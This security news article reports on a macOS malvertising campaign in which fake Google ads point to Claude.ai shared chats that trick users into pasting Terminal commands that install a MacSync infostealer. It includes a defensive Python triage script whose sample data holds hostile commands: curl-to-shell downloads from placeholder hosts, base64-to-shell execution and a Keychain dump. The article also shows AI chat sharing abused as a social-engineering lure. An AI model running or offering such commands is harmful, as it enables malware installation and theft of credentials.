Hackers Exploit Google Ads and AI Chats for Malware Distribution on Macs
Malware Campaign Targets macOS Users Through Legitimate Google Ads and Claude.ai Chats
A recent malvertising campaign has been observed exploiting Google Ads and legitimate Claude.ai shared chats to deliver macOS malware to unsuspecting victims.
The Scheme Involves Fake Google Ads and Claude.ai Shared Chats
The scheme involves creating fake Google ads that direct users to Claude.ai’s official website, where they are presented with a shared chat containing malicious instructions.
These instructions prompt users to open Terminal and paste a command, which ultimately leads to the download and execution of a malicious payload on their macOS device.
The Malware Campaign Was Discovered by Berk Albayrak
Berk Albayrak, a security engineer at Trendyol Group, found a Claude.ai shared chat presenting itself as an official “Claude Code on Mac” installation guide, attributed to “Apple Support.”
The chat instructed users to open Terminal and paste a command, which silently downloaded and executed a malicious payload hosted on customroofingcontractors[.]com.
Further Investigation Revealed a Second Shared Claude Chat Carrying Out the Same Attack
Further investigation revealed a second shared Claude chat carrying out the same attack through entirely separate infrastructure.
This chat followed an identical structure and social engineering approach but used different domains and payloads.
Both chats were publicly accessible at the time of discovery.
The Malware Identified by Researchers Is a Variant of the MacSync macOS Infostealer
Upon analyzing the malware, researchers identified that it is a variant of the MacSync macOS infostealer.
The malware harvests browser credentials, cookies, and macOS Keychain contents, packages them up, and exfiltrates them to the attacker’s server.
The Variant Identified by Albayrak Appeared to Skip Profiling Steps
The variant identified by Albayrak appeared to skip the profiling steps and go straight to execution, whereas the variant identified by BleepingComputer collected the victim’s external IP address, hostname, OS version, and keyboard locale before delivering the payload.
Treating Instructions Asking Users to Paste Terminal Commands With Caution
Researchers have highlighted the importance of treating any instructions asking users to paste Terminal commands with caution, regardless of where those instructions appear to come from.
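The lure described in this article works because a pasted Terminal command can download and run code with no further prompt. As an added illustration of the "treat pasted commands with caution" advice (not code from the article or from any of the researchers named), the following Python script triages shell command lines and flags the traits such lures share: remote content piped straight into a shell, a shell executing the output of a download, base64-decoded text piped into a shell, detached execution with output hidden, and command-line access to the macOS Keychain that the infostealer section mentions. The sample command lines are constructed, the domains are placeholders, and the rule set is an assumption about what a reviewer would want flagged; a help desk or SOC could run the same logic over a user's shell history during triage.

```python
import re
from dataclasses import dataclass, field

# Constructed sample command lines (not from the campaign). Domains are placeholders.
SAMPLE_COMMANDS = [
    "ls -la ~/Documents",
    "brew install node",
    'curl -fsSL "https://updates.example.invalid/install.sh" | bash',
    "echo aGVsbG8= | base64 -d | sh",
    'nohup bash -c "$(curl -s http://cdn.example.invalid/a)" >/dev/null 2>&1 &',
    "security dump-keychain -d ~/Library/Keychains/login.keychain-db",
    "git clone https://github.com/example/repo.git",
]

# Each rule is (compiled pattern, human-readable reason). Assumed rule set, not
# a published signature; extend it for your own environment.
RULES = [
    (re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b"),
     "remote content piped straight into a shell"),
    (re.compile(r"\$\(\s*(curl|wget)\b"),
     "shell executes the output of a download (command substitution)"),
    (re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba|z)?sh\b"),
     "base64-decoded content piped into a shell"),
    (re.compile(r"\bnohup\b|&\s*$|>\s*/dev/null\s+2>&1"),
     "runs detached or hides its output"),
    (re.compile(r"\bsecurity\s+(dump-keychain|find-(generic|internet)-password)\b"),
     "reads macOS Keychain contents from the command line"),
]


@dataclass
class Finding:
    """One command line and the reasons it was flagged (empty list means clean)."""
    command: str
    reasons: list = field(default_factory=list)


def assess(command: str) -> Finding:
    """Run every rule over one command line and collect the matching reasons."""
    reasons = [reason for pattern, reason in RULES if pattern.search(command)]
    return Finding(command, reasons)


def is_suspicious(command: str) -> bool:
    """True when at least one rule matched."""
    return bool(assess(command).reasons)


def triage(commands):
    """Return only the flagged findings, preserving input order."""
    return [f for f in (assess(c) for c in commands) if f.reasons]


if __name__ == "__main__":
    for finding in triage(SAMPLE_COMMANDS):
        print(f"FLAGGED: {finding.command}")
        for reason in finding.reasons:
            print(f"    - {reason}")
```

The rules deliberately key on structure (where the bytes come from and where they go) rather than on any one domain or payload name, since the article notes the second chat used entirely separate infrastructure with the same social-engineering shape; a domain blocklist would have missed it, a structural check would not.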
Malvertising Has Become a Common Method for Delivering Malware
Malvertising has become a common method for delivering malware, and this campaign serves as a reminder of the evolving tactics employed by attackers.
As users continue to rely on online platforms and services, they must remain vigilant against such threats.
Related News: New Variant of Malware Dubbed Beagle
In related news, researchers have discovered a new variant of malware, dubbed Beagle, which is delivered via a fake Claude AI website.
Additionally, Google has expanded its Gemini AI capabilities to fight malicious ads on its platform, highlighting the ongoing efforts to combat online threats.
As the landscape of online threats continues to evolve, it is essential for individuals and organizations to stay informed and take necessary precautions to protect themselves against malware and other cyber threats.